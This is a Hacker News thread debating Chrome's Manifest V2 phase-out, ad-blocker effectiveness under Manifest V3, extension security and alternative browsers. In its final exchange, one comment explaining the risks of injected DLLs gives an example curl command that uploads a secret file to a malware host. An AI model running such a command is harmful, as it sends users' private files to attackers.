> No one was saying that adblockers would literally stop working
That's sure what it sounded like. That it would literally be so bad you'd have to switch browsers because of how degraded the experience would be.
> What evidence would you actually accept anyway?
The fact that the adblocking experience was significantly degraded for the average user -- e.g. that now 10% or 25% of ads were getting through.
> And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior...
Yeah, pretty much. As far as I can tell, security and performance seem to justify the Manifest v3 changes. Occam's Razor says you don't need anything else. If you think there's malicious intention, then the onus of proof is on you.
I was told, time and time again, than Manifest v3 would result in an adblocking experience so bad that people would start switching browsers because of it, that Google was cracking down on adblockers to neuter them. Now that it's here and my adblocking works just as well, maybe even better (if it's sped up page loading times) -- then sorry, as far as I can tell the malicious intention was made-up.
> ...and didn't notice a single change. Not a single ad gets through.
When I tried UBO Lite recently it couldn't block YouTube ads, not sure if that's impossible with Manifest V3, or if UBO Lite just isn't updated regularly like UBO to defeat the YouTube anti-ad-blocking updates.
Update: looks like it's fixed now, not bad :)
Youtube's adblocker-evasion and adblocker's youtube ad blocking has been a cat-and-mouse game since time immemorial.
People seem to see what they want. And many seem to be blinded by Google hate and must find ways to be unhappy with all decisions they make. Google has publicly delayed v2 depreciation to ensure ad blockers worked well under v3.
It makes things a bit more annoying? But in v3 you can still do everything you need to do to block ads
The same Google that's currently in legal hot water for always hiding its true motivations so effectively that even lawyers can't get any relevant documents?
If I remember right then the difference is more about ad-tracking/privacy than blocking. V2 allowed UBO to find and intercept the calls to the ad servers before the calls were made. Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
> Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
That's not what the docs say [1]:
A single rule does one of the following:
- Block a network request.
- Upgrade the schema (http to https).
- Prevent a request from getting blocked by negating any matching blocked rules.
- Redirect a network request.
- Modify request or response headers.
[1] https://developer.chrome.com/docs/extensions/reference/api/d...
On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
MV3 doesn’t allow extensions to know what requests are being made, so extensions can’t use your data maliciously.
Requests to ads that are blocked are blocked.
I think you’re thinking of Privacy-preserving ad measurement which is an option in Firefox and Safari. https://support.mozilla.org/en-US/kb/privacy-preserving-attr...
Doesn't onBeforeRequest still exist in Manifest v3? The thing that's been removed is the ability to block on it, not the ability to register handlers for requests.
It still exists, but now “ad blockers” can’t use the blocking API to record and forward metrics on hits. Ad blockers don’t even need the webRequest and webRequestBlocking permissions anymore.
Now, if an ad blocker has webRequest permissions it’s a red flag.
For example https://developer.chrome.com/docs/extensions/develop/concept... uses webRequest to send telemetry back to some remote server.
Thanks, I see how that can help.
With Manifest v3, let's say I'm an ad blocker and I want to get access to metrics not to violate privacy, but just to report them to the user (X domains blocked, Y out of Z requests blocked, etc). How would I get access to those metrics?
Separate permission for debugging only available for development essentially. https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
Otherwise, you can’t really without more invasive permissions.
https://stackoverflow.com/questions/74813523/chrome-extensio...
Oh wow, that's wild. Closing the loop on reporting things is such an important part of a trustworthy user experience.
> On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
Which is something we know for a fact uBlock Origin doesn't do. It's open source, you can check the code yourself. MV3, on the other hand, doesn't do much to assure me that an addon isn't phoning home. Why not just give the user to ability to block network requests on a per-addon basis? Too difficult a task for the trillion dollar company? Or could it be that forcing users to switch to MV3 addons isn't about safety at all?
but op wasn't talking about what extensions are seeing, but what the ad servers do. You haven't address their point at all
Yeah, I don't browse the web without an ad blocker.
Switch to a different browser! The Chrome monopoly only exists because we collectively allow it to exist.
I hoped this day would never arrive, but alas all good things must come to an end. Since adopting uMatrix, my web experience radically changed and I can never go back to a pre-uMatrix world. With the v2 removal, I've got to eliminate Chrome from my life.
I also adopted a workflow that has been very conveninent for many years, essentially using Chrome for personal stuff and Firefox for work and other various things (especially once container support arrived!). It's not going to be easy to undo years of muscle memory, but I guess it's time to bite the bullet.
This submission title does not appear to be accurate. Here's what was actually said:
> October 9th 2024: an update on Manifest V2 phase-out.
> Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels.
> We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks. Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension. For a short time, users will still be able to turn their Manifest V2 extensions back on. Enterprises using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025. See our May 2024 blog for more context.
They said "we have started disabling Manifest V2 extensions on pre-stable channels", and the "Chrome canary" referenced in the submission title is a pre-stable channel. The submission title is accurate, but narrowly highlighting only one facet of Google's update statement.
That's old news, as noted in my other comment: https://news.ycombinator.com/item?id=41810420
The change here is actually about the stable channel.
Also, the title makes it sound like MV2 code has been removed from the source, but that's not the case.
> That's old news, as noted in my other comment:
None of your comments have actually provided evidence for this assertion, and the previous update dated June 3rd 2024 says users will start seeing a warning. So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
> None of your comments have actually provided evidence for this assertion
It's not an assertion. It's simple reading comprehension. How else can you interpret this?
"Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels. [paragraph break] We will now [emphasis mine] begin disabling installed extensions still using Manifest V2 in Chrome stable."
> So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
I don't know if it was publicized, until now.
After all, when did they publicize that there would be a warning in Chrome stable? But there is a warning in Chrome stable. That started happening some time before this announcement.
Four months is a long gap between announcements.
> I don't know if it was publicized, until now.
So you literally don't know if it was news before now, but you're insisting on calling it "old news", apparently based solely on Google using past tense in their announcement.
> So you literally don't know if it was news before now, but you're insisting on calling it "old news"
That was just a figure of speech, which I don't wish to quibble over. I don't insist on using that phrase. The point, from the beginning, is that the HN submission title is not good.
It actually doesn't matter when exactly that Google began disabling MV2 extensions in Chrome canary, because what's the justification for focusing on canary in the submission title when the announcement says, "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable"?
[EDIT:] I see that the submission title has now indeed been changed, so this argument has become redundant.
But still it’s the first stab wound inflicted on CaesarMainline, he’s toast
Ok, I've replaced the title with that language from the article (shortened a bit to fit HN's 80 char title limit). Thanks!
Submitted title was "Manifest v2 is now removed from Chrome canary"
The most relevant part is:
> Additionally, we have started disabling Manifest V2 extensions on pre-stable channels.
Title could have been a bit more broad (probably should say "pre-stable" instead of "canary"), but I would say it is inaccurate.
> The most relevant part is:
That's actually not the most relevant part. The most relevant part is "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks."
Google had already started disabling Manifest V2 extensions on pre-stable channels, prior to October 9.
The first paragraph is "what we've been doing." The second paragraph is "what we'll do now."
On Mac OS: https://kagi.com/orion/
From the Orion FAQ:
> Is Orion open-source?
> We’re working on it! We’ve begun with some of our components and intend to open more in the future.
> Forking WebKit, porting hundreds of APIs and writing a browser app from scratch has been challenging for our small team. Properly maintaining an open-source project takes time and resources we’re short on at the moment, so if you want to contribute at this time, please consider becoming active on orionfeedback.org.
I won’t be touching this binary with a ten foot pole until every line of code is open.
Many excellent alternatives already exist that are also open and free, I don’t see a compelling argument to use this software on any device at the moment.
Curious why exactly and what is wrong with closed source paid for products? By that token nobody should be touching Safari or iOS/macOS for that matter?
> By that token nobody should be touching Safari or iOS/macOS for that matter?
Ideally, yes.
Fair play, but by that logic you shouldn't touch Mac OS as well, so the whole thing is moot since Mac OS is the only OS that is supported by Orion.
Isn't Webkit GPL? How is it not open source?
Just a general rule of thumb that has served me well: If it's GPL, Apple wouldn't be using it. Apple hates the GPL as it is the antithesis of their operating model.
https://webkit.org/licensing-webkit/
WebKit is part LGPL, and part BSD.
So I think from purely a licensing point of view, they are probably not in violation. Provided that the way they are linking the LGPL-licensed code is compatible with the LGPL.
But like the other commenter said, I too would not run any web browser that was not fully open source, like this Orion browser.
If they are forking Webkit, like they say, doesn't that require they distribute the source to their fork? Even if they don't have to distribute the browser linking to it?
Or do I not understand the obligations of LGPL?
I love Kagi, but I wish they focused on their core product first. Search is a hard problem to nail down and there's no shortage of bugs in Kagi right now, their issue tracker is a solid testament to that. When they spread their attention and resources between multiple products, they run the risk of pulling a Mozilla and shooting themselves in the foot multiple times.
Orion is amazing.
For people who want to stick with a Chrome-based browser while still using the full-featured uBlock Origin: Brave will keep supporting uBlock Origin even after Manifest V2's removal from Chromium.
Brave browser should probably not be trusted. They violated basic trust by redirecting URLs to their own affiliate links for those URLs. That is pretty bad. https://www.theverge.com/2020/6/8/21283769/brave-browser-aff...
For how long, though? And what will be the next marketing scam after crypto/tokens? Something with AI?
Note that Brave's creator opposes same sex marriage, is a Coronavirus "skeptic", and his silly cryptocurrency is made to work with brave browser.
Brave's creator, B. Eich, also created JavaScript, so I assume you have that disabled everywhere.
Oh I wish.
>opposes same sex marriage
That's not true, he donated to organizations supporting California Proposition 8 which banned same-sex marriage which by the way was supported by the majority back then in California. That was also 16 years ago, it's time to let it go and stop spreading misinformation. You should instead not rely on ad-hominem and critize Brave for being ridden with cryptocurrency and doing shady stuff.
I don't care.
Totally unrelated, firefox is an excellent browser
But not when you want to install GrapheneOS using the web-based installer, because Mozilla refuses to implement WebUSB
Has anyone been using the v3 compatible version of uBlock Origin? Have you noticed much of a difference? From what I read there isn't supposed to be much of a difference?
Static list of uris versus live heuristics. So "much of a difference" depends a lot on what you browse. If your browsing is covered by the static list, yes...there's little difference.
Also, keep in mind advertisers are not unaware of all this movement. You don't think they'll try new tactics once they know everyone using chrome is now hobbled to solely static lists? That cloaking (or other approaches) won't then become really popular?
A lot of other ad blockers use static lists for years. The fact that they work tells that ad industry does not see the blockers as a problem that needs to be dealt with. It can also be that so far the increased cost of development of ads that are immune to simple static lists is not worth it.
I’ve noticed a huge number of websites have interstitials pop up asking you to remove your ad blocker. While some let you bypass it anyway some don’t. Clearly the websites themselves seem to care.
Right. Advertisers didn't bother with all these tactics because normal chrome users could download a plugin without any major hurdles to thwart it. Why drive people that wouldn't otherwise use an ad blocker to do so?
That's going away now. Now mostly everyone is vulnerable with the only recourse being pretty technical stuff, not just downloading a very popular plugin.
So advertisers will now be free to get more aggressive without much downside.
Edit: I do get that this sounds like conspiracy theory. But it really matches the Google boiling frogs approach. Removing the blocking onBeforeRequest, as one of the very first things in the manifest v3 spec was not a coincidence.
Even if Google did want to reduce effectiveness of ad blockers, doing that via removal of blocking webRequest API is a double-edged sword. It may push users to alternate browsers with more effective ad-blocking.
Besides, webRequest implementation in Chromium is a terrible collection of hacks on hacks. It is a good example how not to design or implement API. I will not be surprised if the removal of the API comes from a simple desire to remove that embarrassing code.
onBeforeRequest was removed because it is a massive spyware and malware vector.
> I do get that this sounds like conspiracy theory.
> … was not a coincidence.
Could it be that it was coincidence? Do you have a solution for reducing extension malware without removing onBeforeRequest?
> onBeforeRequest was removed because it is a massive spyware and malware vector.
Yet you can still inject js right into the page. You just can't stop a page that was going to load from loading. They could have taken away the onBeforeRequest redirect capability and left just the onBeforeRequest cancel capability.
Not sure I've heard of any spyware/malware depending on just that cancel capability.
That uses a different manifest permission.
https://developer.chrome.com/blog/crx-scripting-api#breaking...
That's remotely hosted code...also a problem, but you can inject code that's not remotely hosted.
The point is that it’s a different permission.
https://news.ycombinator.com/item?id=41812416
If you are really privacy conscientious, ad blocking extensions should be able to exist without any access to web requests now.
I feel like we're losing the plot here. Removing the cancel capability of onBeforeRequest didn't improve security much. It did, though, hobble ad blockers to just dealing with static lists if they want to prevent an ad from downloading in the first place.
Removing the onBeforeRequest redirect didn't add much security either, since you can just ask for permission B instead of permission A and just inject code. Though, ad blockers don't need that anyway.
It’s insane to think that an extension with the ability to snoop on all your requests is more privacy oriented than one that can’t.
It’s insane to want extensions to snoop on all your requests in an attempt at more privacy.
Well, I would allow it for one specific extension that I feel does more good than harm for the capability. Call me insane.
I made a plugin for scraping using onBeforeRequest. It's very useful.
I have been using the Firefox version of it for more than a year by now, basically as soon as it came out. I commented on HN that I was going to do it: https://news.ycombinator.com/item?id=37219071
There's no difference whatsoever.
And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Of course this differs with the kind of sites you visit. So you need to try it on your own. I can believe that perhaps for some people this is a downgrade, but don't automatically assume uBlock Origin Lite won't work well for you.
Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago, finally matching the security and the privacy in that regard. The reduction in adblocking is so miniscule in aggregate - since declarative approach will always cover all the major advertisers - that it's not even a meaningful "trade-off".
It’s similar, but not the same. Safari lets you dynamically generate rules that are then compiled for privacy and efficiency. The limits were increased to 150000 rules per content blocker due to user demands [1]. And each extension can have multiple content blockers.
MV3 has a measly 30000 static rule limit. These rules are included with the extension and cannot be updated dynamically. And a 5000 dynamic rules limit. [2]
EDIT: Chrome now has a 300000 shared pool for static rules for extensions that go over their 30000 limit. And a 30000 dynamic rule limit [3].
[1] https://adguard.com/en/blog/adguard-for-safari-1-11.html
[2] https://adguard.com/en/blog/adguard-mv3-beta.html
[3] https://developer.chrome.com/docs/extensions/develop/concept...
The limit is 330000 rules:
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000." https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
It looks like it’s a shared quota now with a minimum per extension [1].
Still sucks that the rules are static though. AdGuard devised a method to diff ruleset changes with the built in rules to generate dynamic rules between extension updates. So, I guess it works.
[1] https://developer.chrome.com/docs/extensions/develop/concept...
> Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago,
iOS I'll give you, but macOS can in fact run ex. Firefox.
> finally matching the security and the privacy in that regard.
"Matching" inferior security+privacy is not a good thing. The only way this is an improvement if you think the blockers are malicious; otherwise a useful tool in the users interest has been made less powerful.
> The only way this is an improvement if you think the blockers are malicious
Extensions and in turn MV2 blockers can easily be malicious.
https://usa.kaspersky.com/blog/dangerous-chrome-extensions-8...
Look at how many in Kaspersky’s list are advertised as ad blockers. The majority of users aren’t tech savvy like HN.
> Look at how many in Kaspersky’s list are advertised as ad blockers
By my count 5, 6 if we include "Autoskip for Youtube", out of 34. That might be an argument for dropping extensions, but I don't think it's an argument for breaking ad blockers.
> That might be an argument for dropping extensions
Those extensions used the same API that ad blockers used, but for malicious purposes.
So, you would support removing that API? Well, that’s what they did for MV3 and implemented an API just for ad blocking.
One of the most common API malware extensions use is what MV3 blocks, and adblock extension is one of the common malware vectors:
https://helpcenter.getadblock.com/hc/en-us/articles/97384768...
https://www.wired.com/story/fake-chrome-extensions-malware/
This has been never ending.
Okay, if you absolutely must then make that specific API require extra audit approval from the extension store, but breaking it outright is throwing out the baby with the bathwater; in a world where the FBI outright recommends an adblocker because ads are such a strong malware vector ( https://techcrunch.com/2022/12/22/fbi-ad-blocker/ ), it's irresponsible to undermine uBo.
Nobody likes extra audit approvals. The platform doesn't want to spend resources doing the audit. The developers don't want to be audited.
The Firefox version of uBlock Origin Lite was pulled due to unsatisfactory audit process: https://news.ycombinator.com/item?id=41707418
I see boatloads of ads in Safari on iOS. To the point that web browsing on my phone is intolerable, so I don't do it.
This is such a data-free anecdote. Which websites are showing ads? Which ad blocker did you install on iOS?
Which adblocker are you using? I have adguard and dont get ads on most safari sites but its just static DNS blocking so first party ad servers like youtube dont get blocked.
> There's no difference whatsoever.
That's simply not true. Have you ever donde a side by side comparison, or are you just going by feeling?
> And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Really?
Because I find adblockers on iOS are nowhere near as good - they let far more ads through, and they leave far more sites broken so I have to disable the ad blocker for the site to work.
That is the fault of the blockers themselves. The one I use (https://apps.apple.com/us/app/1blocker-ad-blocker/id13655310...) works extremely well and even uses a local VPN setup for app ad-filtering.
Twitter and YouTube ads are blocked.
The drawback? It isn’t free.
I’ve been using AdGuard. There are some limitations with MV3, but it’s not noticeable [1]. AdGuard uses dynamic rules for updating rules between extension updates and for custom user rules. There’s the option using their system level AdBlocker too.
[1] https://adguard.com/en/blog/adguard-browser-extension-mv3-re...
Another happy user of uBlock Origin Lite on Chrome here. No difference. 1Blocker on Safari user since Apple came out with the declarative adblocking system there as well.
I used the lite version while on chromium for some time. I noticed no difference in terms of blocking ads.
The main thing I missed was the ability to block arbitrary elements with the zapper. I use this for more than just ads, so losing it is a real loss in functionality. Otherwise it worked fine.
I've been using Lite for the past few months, I've seen no real difference. I think if you're particular about rulesets or are heavily customizing uBlock you may want to consider switching browsers, but I'm happy enough that I'm remaining on Chrome.
I use Adblock Plus, and ad blocking still perfectly works. Not sure about uBlock origin though.
I for one am just going to wait it out and see what the internet looks like nowadays without an adblocker, if it doesn't auto-update. It's been so long.
If anyone has any guides or blogs related to migrating away from Chrome for a multi-decade user (thousands of bookmarks, saved pages/read later, etc.) I would sure be interested.
Every time I try to migrate my very large bookmark collection to another browser, it either misbehaves and partially loses some data or fails completely.
I'm addition to all the calls to switch to another browser I'd also have people consider the websites they use as potential dependencies on chrome.
Right now most websites don't seem to require any specific chrome feature but with Google's pushing some API's like their Web Environment Integrity proposal I'm worried sites will start to lock their site to Google Chrome and their official Mobile clients.
Adblockers are my least concern, a lot of other useful add-ons won't work, like Imagus, Redirector, Violentmonkey, etc. So I switched to Firefox a few months ago.
Goodbye Chrome, hello firefox
I was looking for an excuse to switch back to Firefox anyways.
And people ask me why I don't run current versions of browsers.
I am tied to Microsoft Edge for sync between desktop and phone, and Microsoft Edge on iOS has AdBlock built in. But looking at this it seems inevitable that Edge will retain V2.
As to switching to Firefox? I'd love to, but Firefox on iOS refuses to put in an AdBlocker. Yea, you can use Firefox Focus but that one doesn't sync.
I don't understand Mozilla's stance on this.
AFAIK, Microsoft is disabling manifest V2 extensions in Edge following the same timeline as Chrome[1]. Brave is continuing to run V2 extensions, but has no plan to stand up their own extension store[2], so it isn't clear how users will get the extensions, beyond a few handpicked ones that Brave is supporting[3].
[1] https://learn.microsoft.com/en-us/microsoft-edge/extensions-...
Firefox doesn't exist on iOS, it's just reskinned safari. It's not Mozillas fault that Apple won't let you install a different web engine.
Edge on iOS, which is also reskinned Safari, has AdBlock Plus integrated.
So it IS possible.
Safari allows some ad blocking but nothing close to ublock.
Take a look at Vivaldi, as well - it covers all major desktop and mobile platforms now and syncs across all of them through their own servers, and it also has integrated adblock.
I'm years ahead of them. I disabled Chrome years ago.
Would it be possible to do an OS level ad blocker that works similarly to uBO?
Seems unlikely with how many different ways ui elements are handles across an OS (including apps that do their own rendering). Though I bet you could block some subset of well known ones and block a lot of the network traffic that feeds ads.
It is really crazy that we are taken hostage/blackmail by whatever harmful decision Google takes in their own interest.
Chromium is open source, you're free to use it.
This is irrelevant because the changes are occurring upstream in Chromium by mostly Google developers.
Anyone using a PiHole to block on their network? I've been aware of it, but honestly, ad blocking was good enough that I didn't go down that route. Is PiHole good enough? Is there a big problem with false positives?
Yep, and it's great. Beyond ads, you can also configure it to block malware. Got a phishing email from scammer.ru? Nothing happens even if you to click the link in it because that name won't resolve. There were a very short list of exceptions, maybe 2 or 3, I had to add to ours over the years, mainly for hostnames like tracking.shippingcompany.com that got added by mistake.
Note that it does nothing to block DNS over HTTPS lookups. If your browser insists on going around your LAN's DNS setup, Pi-hole can't help you.
It can't handle YouTube ads unfortunately.
I'm using nextdns - happy with it.
Id argue pihole is roughly equivalent to what you can do with manifest v3 based afld blockers. I use it as my primary ad blocker as well, and don't really understand why folks are upset about losing V2 that much. It seems like removing root in favor of more granular permissions which is generally a good thing.
I agree that more granular permissions is better (in terms of dictating which sites an extension has access to) but I think the main problem as I understand it is that this is an entirely seperate issue from the one that nukes uBO.
V3 introduces a hard limit on the total number network filters an extension is allowed to set and it's a laughably low number. Far below what uBO uses even on a barebones, default setup
Chrome to Firefox is a relatively easy switch, especially for those that don’t depend on Google sync. The main sources of friction for me were the lack of a good profile switching UI (solved with a browser extension that mimics the Chrome menu), and weird security requirements for homemade extensions (IIRC if you want to have the extension persist after restarting Firefox, you need to sign the extension, which is a pain)
For users switching from Arc, there is no good alternative, but Firefox with Sidebery and custom CSS comes close.
I don't know if this is what you meant, but as an alternative to profile switching, there are Multi Account Containers [1]. It allows assigning a container to each tab, and the containers are isolated from each other. If you have an MS or Google account for both work and personal, you can open them at the same time in different tabs.
[1] https://addons.mozilla.org/en-US/firefox/addon/multi-account...
I'm using using multiple profiles when I want to have a different set of extensions, bookmarks and browsing history. Multi Account Containers help with none of that.
this is such a killer feature I don't understand why it even is an extension, every browser that isn't adversarial to the user should have that feature tbh
I've found it hard to teach people how to use but it is a killer feature.
> For users switching from Arc, there is no good alternative, but Firefox with Sidebery and custom CSS comes close.
I would suggest zen browser [1] for those people.
I'd like to pop in and say Waterfox also has a list of comparable features: https://www.reddit.com/r/waterfox/comments/1ff0kzz/comment/l...
Note that Firefox profile management is getting an overhaul right now, including an easy profile switching UI. I'm not sure when it will be landing in release, but it is being actively built!
I've tried to switch from Vivaldi to Floorp and there is some things that Firefox does that drive me absolutely nuts.
The main one is the behaviour of pinned tabs. Pinning in Firefox turns it into an icon that is harder to hit and doesn't even protect it from closing. This makes them essentially useless, they should be moved to the front of the tab bar and be protected from closing.
The second is that when you use vertical tabs the tab bar acts like a title bar instead of a separate entity. This means you can't double click to create a new tab, and trying to drag a tab often results in the entire window moving. I have to use Tree style tabs and disable the normal tab bar completely to prevent this.
There are also things that I don't like such as how downloads are handled and I've has issues with my session tabs being saved properly.
Profile is already available in Firefox(before chrome implemented it). Details on how to use it: https://support.mozilla.org/en-US/kb/profile-manager-create-...
Also in chrome, multiple profiles need multiple google account(If I understand the UI correctly)connected, but in Firefox no account is needed.
> Also in chrome, multiple profiles need multiple google account(If I understand the UI correctly)connected, but in Firefox no account is needed.
You can use Chrome with multiple profiles by disabling the "Allow Chrome sign-in" option so that none of your browser profiles are tied to a Google account. I don't know if that option can be toggled on a per-profile basis, because I happen to prefer it off for all of my browser profiles.
Arc has a built-in adblocker, so it depends if you're tied specifically to uBlock Origin (non-lite) features.
I'm not sure what other extensions would be broken in Manifest v3.
I don't know much about Arc. But Arc users could give Firefox "Nightly" a try to preview new features coming up. It has vertical tabs and you can "pin" a few tabs at the top. Nightly also has containers already built-in, so you can have multiple accounts open for the same site in different container tabs.
One feature that is missing, removed, from Firefox is PWA's/running sites as apps. This is super handy for low trust apps
In the past I've had a lot of issues with Google properties not working properly on Firefox -- either outright broken or using crazy amounts of CPU on Firefox but not Chromium-based browsers. Does anyone know if this is still an issue? I'd love to try again before I'm forced to by uBO breaking.
Firefox containers are amazing
I've been using Floorp for a while to get proper vertical tabs.
I love Mozilla, but I’m concerned about its future. Since 80% of its income reportedly comes from the Google search deal, do they have a plan to replace it after the recent ruling? And can they maintain their current level of autonomy while doing so?
Killing adblocking in Chrome might be a boost they need to attract someone else to pay for being the landing search page. I doubt if anyone will pay as much as google though. Or probably even close.
The Android version of Firefox still doesn't have working keyboard shortcuts after 13 years or a way to delete individual history items to prevent broken auto complete. The money is going into lots of other things than the browser.
I'm not sure keyboard shortcuts for a version designed to run on an OS for devices without keyboards will ever be a priority. You can use a keyboard on an Android device, but the vast, vast majority of Android devices are phones that never get used with keyboards. I don't expect there's much priority to adding that feature.
I agree that a lot of money is going to things other than the browser though.
Many people use tablets and foldables with keyboards
uBlock Origin + Multi Account Containers makes Firefox enjoyable to use.
Main reason I'm still using Chrome and can't switch to Firefox: https://connect.mozilla.org/t5/ideas/feature-suggestion-fire...
There is something wrong with your Firefox installation (maybe try a new profile with vanilla settings). I use search shortcuts all the time (w + spacebar for wikipedia) and it's exactly the same behavior in Firefox than Chrome/Edge.
hm i'll post this in the thread over there later but i'm pretty sure ff has that?
Time to switch my last machine that still uses Chrome as the default.
V3 has some utterly/unnecessarily complicated shite going on, like offscreen documents, and I think it will get worse as time progresses. Google really needs some bludgeoning.
I have not kept up -what is the steel man argument for V3? Presumably Google has a rationale other than “ad blockers are bad for business”
What does this mean for browsers derived from chrome, like Arc? I heard they plan on continuing to support Manifest v2, but will ublock continue to be maintained for chrome?
MV2 code should remain well into 2025 since enterprises can still enable MV2 extensions. After that they may have to hard fork, which could become increasingly costly. Though they could coordinate to minimize duplicated efforts.
> Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension.
I'm curious about which extensions will be recommended to replace uBlock Origin after it's disabled. I'm sure those alternatives will see a surge in installs.
Also, why doesn't the creator of uBlock Origin update the V2 version to the V3 version? I know V3 version isn't as good as V2, but if you're developing that product, at least give your users something instead of leaving them with nothing. Otherwise, they may end up choosing poor alternatives.
Everything you said has already been done: https://chromewebstore.google.com/detail/ublock-origin-lite/...
This V3 version will be pushed as a regular update on the current V2 version before is disabled? I think that must be done now to avoid even the alerts on users.
can i just setup dns blocking on my network to block the ad requests? especially on youtube, ublock origin stopped working a few weeks ago.
So yes... but the issue with DNS blocking is in the exceptions.
First, exceptions are at the domain level. So you can't say "allow this domain on this site", you have to blanket-allow a domain or not.
Second, the UX for making exceptions isn't great. With uBO it's just a couple of clicks. With something like Pi-hole it's more complex: https://discourse.pi-hole.net/t/how-do-i-whitelist-or-blackl...
Not enough, especially since your browser may weasel out of it by using its own DNS via DoH.
Are you aware of any that do this? I've been using pihole for years and have no complaints. I've only seen smart TVs seem to do this, although it's usually configurable.
One example that I was remembering was Chromecast. It needed Google DNS to work at all.
In general, though if an app sticks to "known good" DNS over HTTPS and pins its certificate to boot, it will bypass DNS-based adblocking very easily, and additionally will punish you by not working at all if you try to do any firewall/routing trickery.
I will recommend Librewolf. Default Firefox has a lot of garbage and bloat.
Darn, ublock also no longer works on Firefox for YouTube. At the beginning of each video there is one forced ad and sometimes the video stops for no reason.
I suppose they want everyone to stop using the Internet and read books.
I run uBO on FF, and I've yet to see any forced ads or video stops.
I'm on FF 131.0.2 with uBO 1.60.0.
Are you on premium. YouTube seemingly doesn't care about my adblocker because I am on premium.
Works for me. I have Youtube on constantly when at my desk as background noise and uBo is still blocking everything perfectly fine.
Edit: Seems Google/Youtube are experimenting/testing with injecting ads directly into the video streams:
https://old.reddit.com/r/uBlockOrigin/comments/1de9kv5/youtu...
You probably need to update your filter lists. There is a megathread on Reddit for this issue, because it can have a lot of other causes also.
https://old.reddit.com/r/uBlockOrigin/comments/1etvawp/youtu...
The Brave Browser still blocks YouTube ads.
Disable all other extensions and update your lists. It will work then.
Why is this thread not on the first 4 or 5 pages of HN?
Down weighted? Happens when mods see too many comments and not enough upvotes.
Ah
Well, the web is unusable without an adblocker. Time to move to another browser.
URL requests should go to a OS level, where the user can intercept them at will. We do not need to give browsers the socket API.
... can we just have a browser that has the functionality of uBlock Origin built-in?
Feeling nostalgic for a time when browsing HTTP wasn't such a persistently-adversarial experience :(
Manifest V3 is not the problem itself. But removing webRequestBlocking and creating some ridiculous limits for the DNR api are, these changes should be reversed downstream.
chrome hasnt been cool for a while
Time to try Supermium again, I couldn't get it to install using my Chrome profile last time, maybe fixed by now.
Unless Supermium is following the manifest path too? Doubt it.
I wish some brave enough (no relation to Brave) soul patched Blink so it became possible to delegate URL blocking decisions to an external process via some sort of IPC. In goes a full URL and maybe an opaque session ID so some state may be tracked, out goes a boolean value. Assume all are allowed if this process cannot be connected to.
Can't we avoid the Manifest bullshit altogether?
I remember how IE plugins roles: just dll inject into the process.
Chrome tries to block the majority of third-party software from injecting code into it:
https://blog.chromium.org/2017/11/reducing-chrome-crashes-ca...
Inject dll's from the internet right into the browser. Yes, let's!
I'm not convinced that this is a good idea, but I don't think that's the reason; don't all your dlls come from the internet?
My comment was sarcasm.
The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.
But that's not a difference, is it? Can't Windows enforce that DLLs have to be signed just like extensions?
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.
Why not avoid all this unnecessary DDL overhead and just load as a kernel module?